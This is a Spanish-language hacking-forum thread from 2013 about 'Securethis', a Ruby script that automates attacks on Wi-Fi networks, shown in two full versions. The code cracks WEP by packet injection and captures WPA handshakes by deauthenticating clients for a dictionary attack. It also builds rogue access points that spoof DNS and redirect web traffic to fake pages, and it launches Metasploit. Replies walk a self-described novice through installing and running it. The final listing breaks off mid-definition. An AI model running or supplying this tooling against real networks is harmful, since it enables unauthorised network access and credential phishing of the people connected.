Board Stats

  • stats Total de Usuarios: 23159
  • stats Total de Mensajes: 107903
  • stats Total de Temas: 10336
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: Securethis V1.0  (Leído 65305 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 1camaron1

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 2426
  • 4 A 5 9 E 3 F 6 C 2 7
Re:Securethis V1.0
« Respuesta #25 en: Abril 11, 2013, 23:18:20 pm »
Koala63 buen trabajo :) y sigue aburriéndote  8)
Saludos!
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

> > > > >   No atiendo por privado temas que puedan tratarse en el foro   < < < <

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #26 en: Abril 11, 2013, 23:20:13 pm »
Será un placer echarte una mano, lo hago mañana por la mañana.
Le he echado un ojo, aún no he podido probarlo, me alegro de que se retome este tema  :)
Tengo en mente traducir al español los tutos  sobre rogue AP de antares en su bloc-notes para dar algo de bases teóricas.
Rogue n'roll http://portalhacker.net/Smileys/classic/kool.gif
Securethis V1.0

   

Desconectado 1camaron1

  • Colaborador
  • Usuario
  • *****
  • Mensajes: 2426
  • 4 A 5 9 E 3 F 6 C 2 7
Re:Securethis V1.0
« Respuesta #27 en: Abril 11, 2013, 23:23:54 pm »
amigo kcdtv dándole caña a perl? ;) es un lenguaje bonito y parece que no es tan "engorroso" 
te veo dando pasos de gigante :)
Saludos.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

> > > > >   No atiendo por privado temas que puedan tratarse en el foro   < < < <

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #28 en: Abril 11, 2013, 23:33:15 pm »
mmmm.... No creo,  :P  : No tengo ni idea de perl  ;D
koala había echo unas cosas en perl si no me confundo...

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #29 en: Abril 11, 2013, 23:43:21 pm »
he tenido muchos problemos con perl, es un languaje que se va un poco en todo los lado... pero es mi aviso   8)

si no usas 'strict' and 'warning' con perl ojo...  :-\

cenomeno1

  • Visitante
Re:Securethis V1.0
« Respuesta #30 en: Abril 12, 2013, 08:12:44 am »
buenas soy nuevo y hospido paciencia  con migo soy un poquito torpe  me gustaría saber como descargar esto y instalarlo en mi  programa que yo uso en linux  alguien tan amable meló explica paso ha paso selo agradecería 
no se si tengo que copiar el escrip ese i que hago con el

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #31 en: Abril 12, 2013, 09:30:17 am »
Hola  ;)

Pienso que va a servir a los otros tambièn la explication.
En primero las dépendancias que neccesita el script, abres un terminal en root y hace eso:

Código: [Seleccionar]
sudo apt-get install ruby
sudo apt-get install rubygems1.8
sudo apt-get install rubygems1.9.1
sudo apt-get install libgtk2-ruby1.8

libgtk es para el futuro por que creo que cuando tiendré mas tiempo haré una version interactiva con mas option toda via.Tengo la version de ruby 1.9.3 pero no es nessecidad de tener lo.

En segundo, la installation de dhcp3-serve,r apache etc..., abres un terminal y empieza la como asi para initializar el script install.rb:

Código: [Seleccionar]
ruby install.rb
Hay que vigilar que todo se passa bien y responder "Y" por yes o "S" por si cuando el terminal te lo pedira.

Cuando has echo todo eso puedes initializar el script Securethis.rb de la misma forma que el install.rb:

Código: [Seleccionar]
ruby Securethis.rb
-Eliges tu red
-Para checkear que tiennes una buena configuracion antes de hacer algo, vas en "Setting"

Despues empiesas las investigaciones  :P

cenomeno1

  • Visitante
Re:Securethis V1.0
« Respuesta #32 en: Abril 12, 2013, 15:03:18 pm »
no lo entiendo muy bien soy muy novato en todo esto i no se  perdonarme  si soy muí tozudo pero necesito alguna aclarazion  mas especializada para  gente como yo que no sabemos nada de como baesto

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 22996
  • Mari
    • WirelessWindows
Re:Securethis V1.0
« Respuesta #33 en: Abril 12, 2013, 15:11:07 pm »
Sigue los pasos que te indica koala63 (saludos) y a partir de ahí si algo no va bien pues comentas resultados..
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

MEGAHOM

  • Visitante
Re:Securethis V1.0
« Respuesta #34 en: Abril 12, 2013, 15:15:18 pm »
no lo entiendo muy bien soy muy novato en todo esto i no se  perdonarme  si soy muí tozudo pero necesito alguna aclarazion  mas especializada para  gente como yo que no sabemos nada de como baesto

Esto es para linux NO para Windows

Un saludo

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 22996
  • Mari
    • WirelessWindows
Re:Securethis V1.0
« Respuesta #35 en: Abril 12, 2013, 15:27:31 pm »

Cita de: MEGAHOM
Esto es para linux NO para Windows

Cita de: cenomeno1
como descargar esto y instalarlo en mi  programa que yo uso en linux
Está usando linux.. o eso dice.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

tio95

  • Visitante
Re:Securethis V1.0
« Respuesta #36 en: Abril 12, 2013, 15:47:00 pm »
Por qué siempre lo interesante y lo bueno sale en Linux :( :( :(

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #37 en: Abril 12, 2013, 17:28:43 pm »
Porque en lugar de quejarte no arrimas el hombro si te gusta windows y haces algo al respecto si te parece que "lo bueno sale en linux"
Un rogue AP con un atheros o un rtl8187l se puede hacer perfectamente bajo windows.
La historia es ir haciéndolo una vez y luego si quieres hacer un script para automatizar los pasos.

No desviemos el hilo con preguntas que no tienen su sitio aquí, abrir un hilo en offtopic si quieres hablar de windows - linux - código libre - Bill Gate etc...

cenomeno1

  • Visitante
Re:Securethis V1.0
« Respuesta #38 en: Abril 12, 2013, 18:02:06 pm »
he seguido los pasos que medio  koala63 pero no nada nos encuentra nada mas medie

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 22996
  • Mari
    • WirelessWindows
Re:Securethis V1.0
« Respuesta #39 en: Abril 12, 2013, 18:15:09 pm »
Citar
he seguido los pasos que medio  koala63 pero no nada nos encuentra nada mas medie
Buenas.. ¿no te das cuenta que con los datos que aportas nadie va a saber que te sucede? ¿como saber que errores te devuelve o lo que realmente sucede sin estar delante de tu PC? ¿o los pasos que das.. exactamente?  A mi ni me viene ni me va.. pero nadie puede ayudarte si solo comentas "he seguido los pasos que medio  koala63 pero no nada nos encuentra nada mas medie"   ::)


..es eso o recuperar la bola de cristal del foro (empeñada por culpa de la crisis) y para esto último recursos humanos dice que no hay dinero aún.

http://img267..us/img267/4861/boladecristaldelforo.jpg
Securethis V1.0
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #40 en: Abril 12, 2013, 19:31:02 pm »
Hola ;)

A ver, que teneis como error?

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #41 en: Abril 12, 2013, 19:49:02 pm »
Traducido al español  ;)




install.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

puts "Este script instalará las dependencias necesarias al funcionamiento de Securethis, solo teneís que estar atento en cuando el terminal le pregunta Y para Yes (si) y N para No. El tiempo de instalación dependera de la calidad de su conexión y de su computadora, podeís ajustar el tiempo entre cada instalación modificando el valor de los comandos "sleep" a dentro del script con un editor de texto, nano, gedit, mousepad, leafpad etc..."
sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
`sudo gem install --no-rdoc --no-ri highline`
 



Securethis.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Elegir su objetivo con airodump-ng y prensar ctrl+c para el paso siguiente"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Ahora entrar cuidadosamente la dirección mac de su objetivo"
mac=""
mac=gets.chomp
$mac=mac

puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Introducir un nombre para el fichero de capturas"
nom=""
nom=gets.chomp
$nom=nom

     puts "Entrar el nombre de la red (eSSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir el canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir la dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Ahora elegir su dirrección MAC y prensar Enter, tener mucho cuidado cuando entréis la dirección mac"
mac=""
mac=gets.chomp
$mac=mac

puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Introducir un nombre para el fichero de capturas"
nom=""
nom=gets.chomp
$nom=nom

     puts "Entrar el nombre de la red (eSSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Introducir un nombre para el fichero de capturas"
nom=""
nom=gets.chomp
$nom=nom

     puts "Entrar el nombre de la red (eSSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Entrar mac del cliente (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrar nombre del diccionario a utilizar"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wpalocal
  puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Introducir nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir dirección mac de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Reglas iptables establecidas, reinicio de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Activación y configuración de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Lanzamiento de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "El escaneo de redes se va a iniciar, elegir su objetivo y prensar ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Introducir nombre red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Introducir canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Introducir la dirrección (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Reglas iptables establecidas, reinicio de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "configuración y lanzamiento de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def hostapd
  puts("Punto de acsesso en modo "Hostpad". Adaptado para hacer un MITM discreto. Asegúrense de que su fichero hostpad.conf es correctamente configurado y que la ruta hacía el fichero es la correcta. Para empezar, cambiar la linea driver=hostapd por la siguiente driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("Elegir la interfaz para efectuar el ataque de desautenticación  (prensar Enter si nquereís uzar la misma interfaz que la empleada para realizar su Punto de Acceso Rogue)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("Entrar el canal de la red objetivo (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("Entrar dirección mac de la red objetivo (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("entrar el nombre del fichero de captura airodump-ng")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase es capaz de encontrar las redes ocultas, solo esperen un poco y la red va a aparecer en su ventana airodump-ng"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Seleccionar el canal de la red objetivo (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Seleccionar la dirección mac del objetivo (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "El punto de acceso Rogue con los parámetros de la red oculta esta en modo activo, vigilar su ventana airodump-ng y esperar a que aparezca el nombre de la red objetivo "
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "ANTES de ejecutar metasploit, si uzaís ubuntu o otra plataforma linux gran publico, asegúrense de tener todas las librerías necesarias al funcionamiento de metalsploit. El lanzamiento de la consola msfconsole puede tardar algo de tiempo... paciencia. Para volver al menú de securtethis, prensar exit en el terminal msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Borrar su fichero index.html y php y todos losl css presentes en  /var/www y poner en su sitio los nuevos ficheros que habéis elegido. Prensar CTRL+C Para parrar inmediatamente !"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Entrar nombre de la carpeta contenedora de las paginas falsas"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "COMPRUEBA y EDITA: los ficheros importantes necesarios a un buen crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Por favor, elegir una opción"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~¿Es su red segura?~~~                            "
 
      menu.choice(:Wepinjection, "inyección.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "ataque diccionario.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local unicamente.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue con internet.") { wparinternet() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "red escondida.") { planque() }
      menu.choice(:Metasploit, "lanzamiento terminal msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "eleminar los ficheros del crack.") { clean() }
      menu.choice(:Settings, "Caja de herramientas.") { settings() }
      menu.choice(:Quit, "Salir del programa.") { exit }
    end
  end
end

 



Esta frase la he traducido "petit-nègre"  ya que no la he entendido del todo...  :P
Citar
puts "CHECK and EDIT: Important file needed for a good crack"


@  cenomeno1
Citar
he seguido los pasos que medio  koala63
No le tengas "medio" a koala, solo come eucalipto  ;D
« Última modificación: Abril 12, 2013, 20:12:21 pm por kcdtv »

cenomeno1

  • Visitante
Re:Securethis V1.0
« Respuesta #42 en: Abril 13, 2013, 14:45:29 pm »
osea el código de selecciono lo pego en la  consola que abro  seguida mente de susus comando no

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #43 en: Abril 13, 2013, 14:54:39 pm »
  Antes de lanzarte en esto tienes que leer y familiarizarte con linux;)
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

 

cenomeno1

  • Visitante
Re:Securethis V1.0
« Respuesta #44 en: Abril 13, 2013, 15:38:23 pm »
ok muchas gracias boi a leerlo lo que dice algo de ubuntu yo en mi caso n uso ubunto pero dara igual no

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #45 en: Abril 13, 2013, 15:49:57 pm »
Si usas una distribución basada en debian (altamente aconsejado) no habrá problemas (Kali, backtrack, ubuntu, debian, xubuntu, linux mint etc...)
Sino tendrás que instalar las dependencias a mano

cenomeno1

  • Visitante
Re:Securethis V1.0
« Respuesta #46 en: Abril 13, 2013, 19:16:58 pm »
ok muchas gracias voy ha probar si soy capaz de ponerlo en marcha 

Desconectado carton968

  • Usuario
  • *
  • Mensajes: 41
Re:Securethis V1.0
« Respuesta #47 en: Abril 13, 2013, 20:00:30 pm »
Podeis subir otra vez las pagina de fileserve que se han caído?? Gracias

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #48 en: Abril 15, 2013, 18:24:16 pm »
Hola  ;)

Probando autra cosa usando el script me ha dado cuenta que he hecho un error, en la linea 135 del script (abre con gedit o otro) hay que escribir:

def wparlocal
he puesto "wpalocal" antes...



Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #49 en: Abril 17, 2013, 03:15:19 am »
Actualization del script Securethis.rb con una vidéo de explication para los que empiezan en linux.  8)

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch


     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wps
